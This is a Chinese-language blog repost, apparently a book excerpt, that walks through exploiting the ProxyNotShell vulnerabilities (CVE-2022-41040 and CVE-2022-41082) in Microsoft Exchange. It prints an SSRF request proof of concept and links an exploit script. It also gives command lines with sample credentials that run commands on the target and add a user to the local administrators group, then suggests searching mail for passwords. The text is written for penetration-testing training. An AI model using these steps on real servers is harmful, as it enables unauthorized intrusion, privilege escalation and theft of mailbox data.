内网域森林之ProxyNotShell漏洞利用

news2024/11/27 22:42:03

点击星标,即时接收最新推文

360729f308373efce6f97ca8a77f2739.png

本文选自《内网安全攻防:红队之路》

在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。   

ProxyNotShell和之前的ProxyShell一样,也是将几个漏洞组合起来使用,分别为CVE-2022-41040和CVE-2022-41082。

ProxyNotShell利用链的第一个漏洞为CVE-2022-41040,该漏洞为Exchange Autodiscover前端中的一个无需认证的SSRF漏洞,攻击者可利用该漏洞以LocalSystem权限向后端的任意URL发送数据。下面为POC:

GET /autodiscover/autodiscover.json?@zdi/PowerShell?serializationLevel=Full;ExchClientVer=15.2.922.7;clientApplication=ManagementShell;TargetServer=;PSVersion=5.1.17763.592&Email=autodiscover/autodiscover.json%3F@zdi HTTP/1.1
Host: 192.168.3.12
Authorization: Basic ZGF2ZTpQYXNzdzByZEAwMg==
Connection: close

ProxyNotShell利用链的第二个漏洞为CVE-2022-41082,是存在于Exchange PowerShell后端的远程代码执行漏洞。在利用CVE-2022-41040绕过认证后,攻击者可利用CVE-2022-41082执行任意命令。

我们可以使用nmap脚本扫描目标服务器是否存在漏洞,如下图所示,脚本地址为https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse:

38ddd9d7272701d81bcb389c236de5a8.png

扫描ProxyNotShell

下图输出表明目标服务器可能存在ProxyNotShell漏洞。接下来,我们进行具体的利用,PoC地址为https://github.com/testanull/ProxyNotShell-PoC(因为部分代码是从其他项目直接复制的,使用的是python2的print语法,如果使用python3运行脚本,需要修改print)。利用的前提是需要一个有效的账户和密码。

pip install requests_ntlm2 requests
python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'ipconfig > c:\inetpub\wwwroot\aspnet_client\ipconfig.txt'
curl -k https://192.168.3.12/aspnet_client/ipconfig.txt

cc5bcbd17d15c4d0d4ba37bba64e1227.png

ProxyNotShell利用

从下图可以看到我们成功在目标服务执行命令。我们也可以将我们控制的用户添加到目标服务器的本地管理员组:

python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'net localgroup administrators dev\dave /add'

f5f41412298c4c6a4be04bfa8eaea1f2.png

ProxyNotShell添加管理员

在获得邮件服务器权限后,我们可以搜索所有邮件,来查找是否存在账户密码信息,或者其他高价值数据,也可以利用Exchange默认的一些组成员关系进行权限提升。

—  实验室旗下直播培训课程  —

81aa06591037adc0ac5859d51c3d23ec.png

2fe8440317d99f4f36ffe8535d1fa8df.jpeg

a56512df6db5defb5f977b1b7c9217d5.jpegc76fabfae30de51473db2cf2292c5b01.png

cea28a8276d964c8ff59eff21a2fc6c9.png

5735b6af594aa394db945fd302882bf5.jpeg

4dae689e6b82bf29ff9a894985cbee6f.jpeg

f8f1cddf3583156348d7b517c7b084ce.jpeg

82bb1b32950efadb49254fbea6d27bbb.png

和20000+位同学加入MS08067一起学习

e0fa9fc1f56507a978fd0fb0d2c13bf9.gif

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1985276.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

60 函数参数——关键参数

关键参数主要指调用函数时的参数传递方式,与函数定义无关。 通过关键参数可以按参数名字传递值,明确指定哪个值传递给哪个参数,实参顺序可以和形参顺序不一致,但不影响参数值的传递结果,避免了用户需要牢记参数位置和…

战锤40K极速狂飙怎么领 战锤40K极速狂飙免费喜加一入库教程

steam喜加一。游戏名称叫做《战锤40K:极速狂飙(Warhammer 40,000: Speed Freeks)》,这是一款背景设定在《战锤40K》宇宙中的竞速游戏,玩家将驾驶装载着炸裂性武器和强大能力的车辆,在肾上腺素爆棚的竞速比赛…

非标自动化ARM供控制器用于绕线机控制解决方案

在现代工业生产中,绕线机是一种广泛应用的设备,用于制造各种线圈和绕组。而绕线机的控制精度和速度直接影响到产品的质量和生产效率。ARMxy 嵌入式电脑作为一种高性能的控制设备,为绕线机控制带来了新的标准。 ARMxy 嵌入式电脑采用了先进的嵌…

计算机毕业设计选题推荐-课程教学平台-Java/Python项目实战

✨作者主页:IT毕设梦工厂✨ 个人简介:曾从事计算机专业培训教学,擅长Java、Python、微信小程序、Golang、安卓Android等项目实战。接项目定制开发、代码讲解、答辩教学、文档编写、降重等。 ☑文末获取源码☑ 精彩专栏推荐⬇⬇⬇ Java项目 Py…

从零开始学python必看,最强“Python编程三剑客(pdf)”,拿来吧你!

从0开始学Python,就问你一句:慌不慌? 说句实在的,慌,可能是因为你自己没有完整的规划,其实就是不知道从何下手,七七八八乱学一通自然还是觉得无厘头。 但今天,我要跟你讲&#xff…

用户资产分级分类、命名和编码规则设计(汽车行业)

用户资产设计目的 用户资产建设要求聚合跨触点数据,对数据进行清洗、转换、整合,实现数据标准化、集成化、用户资产化,沉淀共性数据服务能力、以快速响应业务需求。 为支撑数据融通共享、数据分析挖掘和数据运营,形成数据业务化…

Python实现深度森林(Deep Forest)回归模型(deepforest回归算法)项目实战

说明:这是一个机器学习实战项目(附带数据代码文档视频讲解),如需数据代码文档视频讲解可以直接到文章最后获取。 1.项目背景 随着大数据和人工智能技术的发展,机器学习已成为解决各种复杂问题的强大工具。在众多机器学…

采用Spring Cloud +UniApp +MySql技术开发,SaaS模式的一套智慧工地云平台源码,支持多端展示:PC端、大屏端、手机端、平板端

基于微服务架构JavaSpring Cloud UniApp MySql技术开发saas模式的一套智慧工地云平台源码,支持多端展示:PC端、大屏端、手机端、平板端。 智慧工地平台支持项目级、公司级、集团级多级权限划分,可根据企业的组织架构进行项目权限、功能权限、…

Shopify被封?Shopify店铺开店到防封全面指南

Shopify,作为独立电商建站领域的佼佼者,其SaaS模式简化了建站流程,无需编程背景即可创建线上店铺,吸引了众多商家的目光。本文将详细讲解Shopify店铺从注册、运营到防封的每一个关键环节,为商家提供一站式指导&#xf…

精通推荐算法20:特征交叉之DCN -- 异构模型Wide侧引入高阶交叉

1 引言 DeepFM通过FM显式引入了二阶特征交叉,提升了低阶特征交叉能力。但在推荐场景中,三阶、四阶甚至更高阶的特征交叉同样十分重要。比如在应用市场(如Google Play)推荐场景中,“年轻”的“男性”用户,对…

用javaagent和javassist实现Arthas的watch功能

一、被监控的服务 spring-boot-demo 1、 pom.xml <?xml version"1.0" encoding"UTF-8"?> <project xmlns"http://maven.apache.org/POM/4.0.0"xmlns:xsi"http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation&q…

如何让AI绘画SD可控又好用?10个硬核控图能力(ControlNet)了解一下

大家好&#xff0c;我是灵魂画师向阳 Stable Diffusion&#xff08;简称SD&#xff09;作为一款目前非常流行且强大的AIGC工具&#xff0c;相信大家已经有一定了解&#xff01; 这款工具的使用说简单却也复杂&#xff0c;想要获得高质量图片&#xff0c;其硬核控图能力**&…

安装Supervisor队列进程、管理 Laravel 队列进程

在 CentOS 上安装 Supervisor 并配置 Laravel 的步骤如下&#xff1a; 1.安装 Supervisor&#xff1a; 使用以下命令安装 Supervisor&#xff1a; sudo yum install epel-release sudo yum install supervisor 2.配置 Supervisor&#xff1a; 创建一个新的 Supervisor 配置文…

ARMxy边缘计算网关用于过程控制子系统

在现代工业生产中&#xff0c;过程控制系统的优化对于提高生产效率、保证产品质量、降低能源消耗等方面都具有重要意义。而 ARMxy 工控机作为一种高性能、高可靠性的工业控制设备&#xff0c;正逐渐成为过程控制系统优化的新选择。 ARMxy 工控机采用了先进的 ARM 架构处理器&am…

海南自闭症学校排名榜最新:突破传统,呵护孩子成长

在当今社会&#xff0c;对于自闭症儿童的教育和康复&#xff0c;关注度日益提高。各种自闭症学校排名榜层出不穷&#xff0c;然而&#xff0c;这些排名榜的真实性和权威性却常常有待商榷。家长们在为孩子选择自闭症寄宿学校时&#xff0c;切不可盲目依赖这些排名&#xff0c;而…

【ProtoBuf】语法类型详解

目录 字段规则 消息类型的定义与使用 嵌套定义 非嵌套定义 同文件中消息类型作为字段类型使用 其他文件.proto文件的消息使用 enum类型 Any类型 oneof类型 map类型 默认值 更新消息 保留字段 未知字段 前后兼容 选项option 字段规则 上篇文章我们提到消息是由…

【Java】字符串相关类的底层原理(014)

目录 ♦️字符串存储的内存原理 &#x1f38f;字面量字符串对象 &#x1f38f;构造函数声明字符串对象 ♦️比较的是什么 &#x1f38f;基本数据类型 &#x1f38f;引用数据类型 ♦️字符串拼接的底层原理 &#x1f38f;拼接的时候没有变量参与 &#x1f38f;拼接的时候…

3GPP 4G 5G 主要协议

4G LTE的协议主要是36 series 5G NR的协议主要是38 series

别被割韭菜了!这些才是好评率90%以上的低代码开发平台!

别找了~别找了~ 翻遍全网&#xff0c;好评率高达 90% 以上的低代码开发平台都在这了&#xff01; 想要“提高人员效率&#xff0c;降低开发成本”的朋友&#xff0c;看这一篇就够了&#xff01; 7100字干货&#xff0c;带你“沉浸式”了解国内 7 家领先的低代码开发平台&…

IPsec VPN综合实验

一、实验目的及拓扑 实验目的&#xff1a; 1、在总部通过防火墙建立双机热备 2、在分支通过路由器向外宣告防火墙NAT SERVER 3、在分支和总部自己建立站点到站点VPN并实现负载分担 二、基础配置 如拓扑所示配置相应端口地址 三、详细配置 &#xff08;一&#xff09;双机…